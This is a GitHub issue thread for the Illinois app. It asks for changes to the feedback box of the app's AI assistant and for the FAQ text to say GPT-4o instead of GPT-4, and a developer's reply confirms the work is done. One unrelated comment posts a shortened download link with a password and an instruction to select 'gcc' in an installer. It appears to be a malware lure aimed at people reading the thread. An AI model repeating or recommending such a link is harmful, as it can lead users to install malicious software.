### ISSUE TITLE
[USABILITY] Update Assistant Feedback UI and FAQ Text

### ISSUE THREAD

**Issue by cdukeUX** [rokwire/illinois-app#4322]
Part 1: To further improve the experience of using the feedback box, please make the following changes (see attached screenshot).

1. Add an "X" with circle icon to close out the feedback box
2. Shorten the text from "Thank you for providing feedback! (line break) Can you briefly explain the issue(s) with the response? [bold]" to "Thanks for your feedback! Please provide additional information on the issue(s). [bold]"
3. Decrease the line spacing to decrease the overall vertical spacing of the box (16pt font should have no more than 18pt line spacing; 14pt font should have no more than 16pt line spacing)
4. Decrease the vertical height of the comment field by half (enough for just two lines of text)

Part 2: In the "Illinois Assistant FAQs" dropdown, please update all mentions of "GPT-4" to "GPT-4o" (three instances).

CC: @vburgett 

<img width="1876" alt="5-7 Update Negative Feedback Comment Field" src="https://github.com/user-attachments/assets/4e86179c-26bd-49b3-9e57-9aebf37216d0">

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dobromirdobrev** [comment]
The items from Part 1 are done in version 6.0.37 of the Illinois app.
Part 2 is done in our Content BB so it is available now in the existing versions of the app.
